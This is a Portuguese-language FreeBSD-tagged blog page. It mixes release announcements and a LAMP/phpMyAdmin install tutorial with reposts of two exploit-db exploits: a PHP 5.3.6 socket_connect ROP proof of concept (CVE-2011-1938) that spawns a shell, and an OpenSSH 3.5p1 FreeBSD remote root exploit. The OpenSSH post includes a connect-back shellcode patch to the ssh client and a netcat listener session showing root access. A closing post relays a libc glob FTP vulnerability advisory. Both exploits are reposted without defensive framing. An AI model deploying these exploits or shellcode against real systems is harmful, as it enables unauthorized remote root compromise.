Posts Tagged ‘freebsd’

PC-BSD 9.0-BETA3 Lançado

Monday, October 3rd, 2011

Confira a nota de lançamento da DistroWatch:

 

PC-BSD Dru Lavigne has announced the availability of the third beta release of PC-BSD 9.0, a user-friendly desktop operating system based on FreeBSD: “The third BETA release of the upcoming PC-BSD 9.0 is now available. This release includes the latest FreeBSD 9.0-BETA3 base, along with numerous bug fixes and enhancements. Changelog: fix issue enabling Flash plugin after installation; fix bug with handbook not launching in LXDE; fix issue performing updates on ZFS systems with separate /boot UFS partition; add lxmenu-data port which provides nicer LXDE menu framework; fix enabling iBus from GDM; include ‘mga’ driver in base; add option to install only Openbox as a window manager; fix bug doing PBI patching and checking the FreeBSD version….” Here is the full release announcement. Download links to the installation and live DVD images: PCBSD9.0-BETA3-x86-DVD.iso (3,179MB, SHA256), PCBSD9.0-BETA3-x86-DVD-live.iso (1,706MB, SHA256), PCBSD9.0-BETA3-x64-DVD.iso (3,292MB, SHA256), PCBSD9.0-BETA3-x64-DVD-live.iso (1,838MB, SHA256).

 

Fonte: http://distrowatch.com/6914

Lançado FreeBSD 9.0-BETA2

Thursday, September 15th, 2011

Ken Smith has announced the availability of the second beta of FreeBSD 9.0, more than a month later than planned: “The second beta build of the 9.0-RELEASE release cycle is now available. Note: the location of the FTP install tree and ISOs have changed slightly. What we used for BETA2 reflects a directory structure that would let us fully utilize building and distributing a wider variety of architectures. The new layout does add some extra complexity, so we’re actively discussing whether or not to change the layout from previous releases, and if we do change it whether or not to change it this much. What’s there now can be viewed as an almost ‘worst-case’ scenario. It’s entirely possible we’ll back off and revert to the old layout despite that layout potentially limiting.” There is much more information in the release announcement, including notes on what to test. Download links for the i386 and amd64 ISO images: FreeBSD-9.0-BETA2-i386-dvd1.iso (498MB, SHA256), FreeBSD-9.0-BETA2-amd64-dvd1.iso (607MB, SHA256).

Fonte: http://distrowatch.com/6875

 

Como instalar Apache, PHP, MySQL, Phpmyadmin e MemCached no FreeBSD 7

Monday, July 4th, 2011

Vamos começar instalando o Mysql.

Precisamos entrar na pasta do mysql:

cd /usr/ports/databases/mysql51-server

Vamos preparar a arquitetura de updates:

make BUILD_OPTIMIZED=yes BUILD_STATIC=yes

Na mesma pasta vamos instalar o mysql:

make install clean

Precisamos ativar o Mysql como serviço iniciado no momento do boot.
Para isto devemos adicionar ao final do arquivo /etc/rc.conf o seguinte:

mysql_enable=”YES”

Devemos agora copiar o arquivo default do mysql para a pasta de configurações e com o nome real:

cp /usr/local/share/mysql/my-medium.cnf /etc/my.cnf

Para iniciar o mysql recém instalado devemos rodar o seguinte:

/usr/local/etc/rc.d/mysql-server start

Precisamos definir agora a senha de root do mysql:

/usr/local/bin/mysqladmin -u root password ‘SUA NOVA SENHA AQUI’

Agora que o mysql está ultra instalado devemos focar no apache, iremos instalar a versão 2.2:

cd /usr/ports/www/apache22

Vamos instalar usando o seguinte comando dentro da pasta a qual entramos com o comando cd:

make install clean

Para garantir que o bixão rode corretamente no momento do boot devemos colocar no final do arquivo /etc/rc.conf a seguinte entrada:

apache22_enable=”YES”

E validaremos isto em outro arquivo também, o /boot/loader.conf, para colocarmos a seguinte entrada lá:

accf_http_load=YES

Agora iremos instalar o PHP5 no bendito. Para isto temos que entrar na pasta do port do php5:

cd /usr/ports/lang/php5

Executaremos a instalação:

make install clean

No caso das extensões do php5, para instalarmos qualquer extensão devemos seguir a seguinte sintaxe:

PDF-Lite (estamos tomando por exemplo aqui)

fetch ftp://ftp.swin.edu.au/gentoo/distfiles/PDFlib-Lite-7.0.2.tar.gz
sudo mv PDFlib-Lite-7.0.2.tar.gz /usr/ports/distfiles/

Agora vamos para o diretório de extensões do php5:

cd /usr/ports/lang/php5-extensions

Vamos ativar os recursos:

make install clean

Vamos criar o path do php.ini corretamente:

cp /usr/local/etc/php.ini-dist /usr/local/etc/php.ini

Para validarmos o php como módulo do apache 2.2 precisamos adicionar as entradas do php. No fim do arquivo /usr/local/etc/apache22/httpd.conf devemos colocar isso aqui:
AddType application/x-httpd-php .php
AddType application/x-httpd-php-source .phps

Devemos agora deixar o index.php como default nos diretórios raizes, para isto devemos trocar (no conf do apache ainda):
DirectoryIndex index.html
por
DirectoryIndex index.php index.html

Vamos editar o gestor de línguas do apache (o conf) /usr/local/etc/apache22/extra/httpd-languages.conf, no fim dele devemos colocar o seguinte:
AddDefaultCharset On

Para validarmos nossas mudanças devemos fazer o seguinte:
/usr/local/etc/rc.d/apache22 start
O comando acima vai reiniciar o apache, validando assim nossas mudanças.

Vamos instalar o Memcached, ultra ferramenta para o php. Usaremos o Pecl (addon do php):

cd /usr/ports/databases/pecl-memcache

Para instalarmos iremos rodar o comando abaixo:

make install clean

Iremos validar a instalação do Memcached:

cd /usr/ports/databases/memcached

make install clean

Vamos deixar o Freezão dar start quando inicializar, dentro do /etc/rc.conf devemos colocar:

memcached_enable=”YES”

E para finalizar toda a brincadeira:

/usr/local/bin/memcached -d -u nobody

Para metermos bala no phpmyadmin iremos fazer o seguinte:

cd /usr/ports/databases/phpmyadmin

Dentro da pasta acima temos de validar nossa instalação direto do port:

make install clean

O phpmyadmin em si já está instalado em seu FreeBSD, mas temos que fazer um Alias no apache para poder colocar a casa em ordem. Iremos fazer o seguinte dentro do conf do apache-> /usr/local/etc/apache22/httpd.conf:

Na sessão ->
Coloque o seguinte dentro dessa tag do apache:

Alias /phpmyadmin /usr/local/www/phpMyAdmin

E para deixar a coisa mais completa, dentro do apache devemos criar um directory para que o phpMyadmin esteja liberado para acesso web, para isto devemos fazer o seguinte:


Order allow,deny
Allow from all


Lembrando que o alis fica fora daí hein?
Vamos ativar o conf do phpmyadmin agora

cd /usr/local/www/phpMyAdmin
mkdir config
chmod 777 config

Vamos ativar nossas bagunças??? Devemos reiniciar o apache agora:

/usr/local/etc/rc.d/apache22 restart

Para setar seu phpmyadmin no fino grão você deverá abrir seu navegador com a seguinte sintaxe de endereço:

http://ip_do_FREEBSD/phpmyadmin/scripts/setup.php

Mude o Tipo de Autenticação para HTTP,
Delete o ROOT do User for config para autenticação,
Você pode deixar todo o resto e depois clicar em Add para adicionar o novo servidor.
Clicando em Save você vai salvar a configuração do phpmyadmin.

Vamos validar nosso conf:

cp config/config.inc.php .

Vamos deletar o arquivo desnecessário e dar permissões corretas e seguras ao conf e assim finalizaremos nosso How to:

rm -rf config
chmod 444 config.inc.php

Para acessar suas coisas web use a pasta: /usr/local/www/data/
E se quiser acessar o phpmyadmin use: http://IP_FREEBSD/phpmyadmin/

The end 😛

s

PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938

Monday, July 4th, 2011

/*
** Jonathan Salwan - @shell_storm
** http://shell-storm.org
** 2011-06-04
**
** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938
**
** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c
** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary
** code via a long pathname for a UNIX socket.
*/

echo "[+] PHP 5.3.6 Buffer Overflow PoC (ROP)n";
echo "[+] CVE-2011-1938nn";

# Gadgets in /usr/bin/php
define('DUMMY', "x42x42x42x42"); // padding
define('STACK', "x20xbax74x08"); // .data 0x46a0 0x874ba20
define('STACK4', "x24xbax74x08"); // STACK + 4
define('STACK8', "x28xbax74x08"); // STACK + 8
define('STACK12', "x3cxbax74x08"); // STACK + 12
define('INT_80', "x27xb6x07x08"); // 0x0807b627: int $0x80
define('INC_EAX', "x66x50x0fx08"); // 0x080f5066: inc %eax | ret
define('XOR_EAX', "x60xb4x09x08"); // 0x0809b460: xor %eax,%eax | ret
define('MOV_A_D', "x84x3ex12x08"); // 0x08123e84: mov %eax,(%edx) | ret
define('POP_EBP', "xc7x48x06x08"); // 0x080648c7: pop %ebp | ret
define('MOV_B_A', "x18x45x06x08"); // 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('MOV_DI_DX', "x20x26x07x08"); // 0x08072620: mov %edi,%edx | pop %esi | pop %edi | pop %ebp | ret
define('POP_EDI', "x23x26x07x08"); // 0x08072623: pop %edi | pop %ebp | ret
define('POP_EBX', "x0fx4dx21x08"); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('XOR_ECX', "xe3x3bx1fx08"); // 0x081f3be3: xor %ecx,%ecx | pop %ebx | mov %ecx,%eax | pop %esi | pop %edi | pop %ebp | ret

$padd = str_repeat("A", 196);

$payload = POP_EDI. // pop %edi
STACK. // 0x874ba20
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"//bi". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK4. // 0x874ba24
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"n/sh". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK8. // 0x874ba28
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
MOV_A_D. // mov %eax,(%edx)
XOR_ECX. // xor %ecx,%ecx
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
POP_EBX. // pop %ebx
STACK. // 0x874ba20
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INT_80; // int $0x80

$evil = $padd.$payload;

$fd = socket_create(AF_UNIX, SOCK_STREAM, 1);
$ret = socket_connect($fd, $evil);
?>

Fonte: http://www.exploit-db.com/exploits/17486/

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

Thursday, June 30th, 2011

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

Discovered and Exploited By Kingcope
Year 2011
--
The last two days I have been investigating a vulnerability in OpenSSH
affecting at least FreeBSD 4.9 and 4.11. These FreeBSD versions run
OpenSSH 3.5p1 in the default install.
The sshd banner for 4.11-RELEASE is "SSH-1.99-OpenSSH_3.5p1 FreeBSD-20060930".
A working Remote Exploit which spawns a root shell remotely and
previous to authentication was developed.
The bug can be triggered both through ssh version 1 and ssh version 2
using a modified ssh client. During the investigation of the vulnerability it was found that
the bug resides in the source code file "auth2-pam-freebsd.c".
http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/openssh/Attic/auth2-pam-freebsd.c
This file does not exist in FreeBSD releases greater than 5.2.1. The last commit
is from 7 years ago.
Specifically the bug follows a code path in the PAM Authentication Thread inside this
source code, "pam_thread()". It could not be verified if the bug is inside this
(third party, freebsd) OpenSSH code or in the FreeBSD pam library itself.
Both the challenge response (ssh version 1) and keyboard interactive via pam
(ssh version 2) authentications go through this code path.
By supplying a long username to the daemon the sshd crashes.
h4x# sysctl kern.sugid_coredump=1
kern.sugid_coredump: 0 -> 1
root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138
h4x# tail -1 /var/log/messages
Jun 30 16:01:25 h4x /kernel: pid 160 (sshd), uid 0: exited on signal 11 (core dumped)
Looking into the coredump reveals:
h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x28092305 in ?? ()
(gdb) x/1i $eip
0x28092305:     (bad)
The sshd crahes at a place with illegal instructions. It looks like it depends
on how the sshd is started. Starting the sshd from the console as root and running
the ssh client with long username again reveals:
h4x# killall -9 sshd
h4x# /usr/sbin/sshd
root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138
h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) x/10i $eip
0x41414141:     Cannot access memory at address 0x41414141.
As you can see in the above gdb output we can control EIP completely.
If someone finds out on what this behaviour depends, especially why EIP can
be controlled when starting sshd in the console and can not be easily controlled
when being run from the boot sequence, please drop me an email at
isowarez.isowarez.isowarez (at) googlemail.com
Anyhow this procedure shows that the sshd can be exploited because the instruction
pointer can be fully controlled.
The developed exploit (Proof of Concept only) is a patched OpenSSH 5.8p2 client.
Using a reverse shellcode it will spawn a rootshell.
Only one offset is needed, the position of the shellcode can be found the following way:
h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) set $x=0x08071000
(gdb) while(*++$x!=0x90909090)
>end
(gdb) x/10b $x
The printed address is the beginning of the shellcode nopsled.
Attached is the Proof of Concept as a diff to OpenSSH-5.8p2.
It roughly does the following:
root@debian:~# ./ssh -1 192.168.32.138
root@debian:~# nc -v -l -p 10000
listening on [any] 10000 ...
192.168.32.138: inverse host lookup failed: Unknown host
connect to [192.168.32.128] from (UNKNOWN) [192.168.32.138] 1038
uname -a;id;
FreeBSD h4x.localdomain 4.11-RELEASE FreeBSD 4.11-RELEASE #0: Fri Jan 21 17:21:22 GMT 2005     root (at) perseus.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
uid=0(root) gid=0(wheel) groups=0(wheel)
--
root@debian:~# diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,717
> // Connect Back Shellcode
>
> #define       IPADDR  "xc0xa8x20x80"
> #define PORT  "x27x10"              /* htons(10000) */
>
> char sc[] =
>    "x90x90"
>    "x90x90"
>    "x31xc9"                 // xor    ecx, ecx
>    "xf7xe1"                 // mul    ecx
>    "x51"                     // push   ecx
>    "x41"                     // inc    ecx
>    "x51"                     // push   ecx
>    "x41"                     // inc    ecx
>    "x51"                     // push   ecx
>    "x51"                     // push   ecx
>    "xb0x61"                 // mov    al, 97
>    "xcdx80"                 // int    80h
>    "x89xc3"                 // mov    ebx, eax
>    "x68"IPADDR                       // push   dword 0101017fh
>    "x66x68"PORT             // push   word 4135
>    "x66x51"                 // push   cx
>    "x89xe6"                 // mov    esi, esp
>    "xb2x10"                 // mov    dl, 16
>    "x52"                     // push   edx
>    "x56"                     // push   esi
>    "x50"                     // push   eax
>    "x50"                     // push   eax
>    "xb0x62"                 // mov    al, 98
>    "xcdx80"                 // int    80h
>    "x41"                     // inc    ecx
>    "xb0x5a"                 // mov    al, 90
>    "x49"                     // dec    ecx
>    "x51"                     // push   ecx
>    "x53"                     // push   ebx
>    "x53"                     // push   ebx
>    "xcdx80"                 // int    80h
>    "x41"                     // inc    ecx
>    "xe2xf5"                 // loop   -10
>    "x51"                     // push   ecx
>    "x68x2fx2fx73x68"     // push   dword 68732f2fh
>    "x68x2fx62x69x6e"     // push   dword 6e69622fh
>    "x89xe3"                 // mov    ebx, esp
>    "x51"                     // push   ecx
>    "x54"                     // push   esp
>    "x53"                     // push   ebx
>    "x53"                     // push   ebx
>    "xb0xc4x34xff"
>    "xcdx80";                // int    80h
>
679a730,737
>       char buffer[8096];
>
>       // Offset is for FreeBSD-4.11 RELEASE OpenSSH 3.5p1
>       memcpy(buffer, "AAAAx58xd8x07x08""CCCCDDDDEEEExd8xd8x07x08""GGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO", 24);
>       memset(buffer+24, 'x90', 5000);
>       memcpy(buffer+24+5000, sc, sizeof(sc));
>       server_user=buffer;
>
690a749
>
Cheers,

Kingcope

 

Fonte: http://www.exploit-db.com/exploits/17462/

BLOG: Vulnerabilidade compromete uso de FTP em servidores Unix-Like

Thursday, October 7th, 2010

Uma notícia muito importante foi divulgada recentemente.  A biblioteca Libc/Glob é utilizada neste exploit, o qual o site http://securityreason.com/securityalert/7822 especifica detalhadamente. Segundo a publicação,  a vulnerabilidade já atingiu empresas de grande porte como até mesmo Adobe. Confira abaixo um trecho:

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/
Date:
– – Dis.: 06.11.2009
– – Pub.: 07.10.2010

CVE: CVE-2010-2632

Affected Software (verified):
– – OpenBSD 4.7
– – NetBSD 5.0.2
– – FreeBSD 7.3/8.1
– – Oracle Sun Solaris 10
– – GNU Libc (glibc)

Affected Ftp Servers:
– – ftp.openbsd.org (verified 02.07.2010: “connection refused” and ban)
– – ftp.netbsd.org (verified 02.07.2010: “connection limit of 160 reached”
and ban)
– – ftp.freebsd.org
– – ftp.adobe.com
– – ftp.hp.com
– – ftp.sun.com
– – more more and more

Affected Vendors (not verified):
– – Apple
– – Microsoft Interix
– – HP
– – more more more

O anúncio principal encontra-se em http://securityreason.com/achievement_securityalert/89

Iremos acompanhar esta thread de perto.
Reportaremos caso possamos descobrir algo a mais sobre esta impactante notícia.